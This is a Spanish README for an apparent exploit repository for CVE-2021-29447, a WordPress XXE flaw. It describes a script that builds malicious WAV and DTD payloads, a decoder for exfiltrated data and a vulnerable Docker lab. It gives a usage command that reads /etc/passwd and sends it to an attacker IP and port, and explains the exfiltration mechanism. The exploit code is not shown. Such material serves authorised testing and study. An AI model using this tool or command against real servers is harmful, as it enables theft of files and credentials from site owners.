
Exploit para CVE-2021-29447, una vulnerabilidad XXE en WordPress 5.7.0 y anteriores. Genera cargas útiles WAV maliciosas para leer archivos arbitrarios del servidor mediante inyección de entidad externa XML. Incluye entorno de prueba Docker.
Este repositorio contiene un exploit para CVE-2021-29447, una vulnerabilidad de XXE (XML External Entity) presente en WordPress 5.7.0 y versiones anteriores. La vulnerabilidad existe en la biblioteca medemblic que procesa archivos WAV, permitiendo a un atacante leer archivos arbitrarios del servidor.
| Archivo | Descripcion |
|---|---|
CVE-2021-29447.sh | Script de explotacion que genera el payload WAV y archivo DTD malicioso |
decode.php | Script PHP para decodificar datos exfiltrados (base64 + zlib) |
docker-compose.yml | Entorno Docker con WordPress vulnerable para pruebas |
docker-compose up -d
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <archivo_objetivo>
Parametros:
-l IP del atacante (LHOST)-p Puerto del atacante (LPORT)-f Ruta del archivo a leer en el servidor-h Mostrar ayudaEjemplo:
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd
Los datos exfiltrados vendran codificados en base64 y comprimidos con zlib. Para decodificarlos:
php decode.php
El exploit funciona insertando una entidad externa XXE en los metadatos de un archivo WAV. Cuando WordPress procesa el archivo, el parser XML resuelve la entidad externa, causando que el servidor realize una peticion HTTP al servidor del atacante con el contenido del archivo codificado en la URL.
Este codigo es solo para fines educativos y de pruebas de penetracion autorizadas. No utilizar en sistemas sin autorizacion explicita.